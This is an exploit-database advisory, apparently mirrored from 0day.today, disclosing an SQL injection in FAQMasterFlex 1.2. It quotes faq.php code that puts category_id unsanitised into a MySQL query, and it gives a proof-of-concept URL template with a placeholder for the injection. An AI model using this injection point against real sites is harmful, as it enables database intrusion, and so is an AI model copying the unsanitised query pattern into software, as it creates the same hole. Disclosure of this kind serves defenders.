Lucene search
K

FAQMasterFlex 1.2 SQL Injection Vulnerability

🗓️ 05 Oct 2010 00:00:00Reported by cyb3r.anbuType 
zdt
 zdt
🔗 0day.today👁 22 Views

FAQMasterFlex 1.2 SQL Injection Vulnerability found on faq.ph

Code
=============================================
FAQMasterFlex 1.2 SQL Injection Vulnerability
=============================================

# Author: [cyb3r.anbu]
# Software Link: [http://www.lethalpenguin.net/design/faqmasterflex.php]
# Version: [1.2]
# Tested on: [Ubuntu]
 
thx:modpr0be,oebaj,bpdp,wamika crew-
 
Bugs found on faq.php :
--snip--
<p><a href="<?php echo
"$_SERVER[PHP_SELF]?print=true&cat_name=$cat_name&category_id=$category_id"
?>">Print FAQs</a></p>
    <table width="100%" border="0" cellpadding="8" cellspacing="0">
        <?php
                include "faq_config.php";
                $result = mysql_query("SELECT * FROM faqs WHERE category_id
= '$category_id'") or die(mysql_error());
                while ($row = mysql_fetch_array($result)) {
--snip
 
PoC:
http://victim/FAQMasterFlex/faq.php?print=true&cat_name=cinema&category_id=[validid][SQL
Injection]
 
thanks for your attention,
 
regrads,
cyb3r.anbu



#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Oct 2010 00:00Current
7.1High risk
Vulners AI Score7.1
22